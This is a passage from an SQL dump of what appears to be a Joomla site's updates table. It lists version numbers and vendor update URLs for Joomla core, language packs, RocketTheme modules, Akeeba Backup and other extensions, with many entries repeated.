Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23995,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23996,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23997,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23998,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23999,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24000,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24001,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24002,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24003,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24004,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24005,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24006,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24007,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24008,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24009,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24010,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24011,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24012,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24013,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24014,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24015,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24016,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24017,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24018,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24019,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24020,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24021,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24022,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24023,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24024,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24025,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24026,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24027,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24028,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24029,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24030,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24031,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24032,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24033,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24034,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24035,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24036,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24037,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24038,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24039,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24040,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24041,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24042,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24043,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24044,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24045,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24046,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24047,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24048,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24049,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24050,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24051,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24052,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24053,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24054,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24055,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24056,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24057,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24058,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24059,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24060,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24061,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24062,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24063,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24064,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24065,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24066,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24067,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24068,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24069,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24070,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24071,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24072,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24073,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24074,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24075,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24076,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24077,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24078,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24079,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24080,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24081,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24082,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24083,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24084,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24085,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24086,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24087,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24088,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24089,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24090,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24091,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24092,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24093,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24094,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24095,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24096,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24097,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24098,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24099,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24100,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24101,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24102,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24103,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24104,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24105,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24106,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24107,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24108,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24109,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24110,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24111,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24112,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24113,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24114,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24115,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24116,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24117,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24118,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24119,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24120,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24121,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24122,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24123,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24124,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24125,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24126,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24127,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24128,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24129,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24130,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24131,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24132,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24133,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24134,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24135,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24136,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24137,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24138,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24139,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24140,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24141,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24142,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24143,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24144,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24145,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24146,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24147,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24148,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24149,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24150,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24151,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24152,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24153,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24154,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24155,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24156,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24157,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24158,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24159,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24160,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24161,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24162,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24163,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24164,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24165,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24166,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24167,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24168,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24169,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24170,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24171,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24172,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24173,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24174,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24175,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24176,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24177,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24178,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24179,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24180,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24181,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24182,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24183,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24184,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24185,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24186,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24187,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24188,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24189,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24190,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24191,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24192,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24193,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24194,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24195,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24196,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24197,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24198,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24199,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24200,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24201,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24202,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24203,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24204,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24205,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24206,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24207,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24208,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24209,20,0,'RokCommon 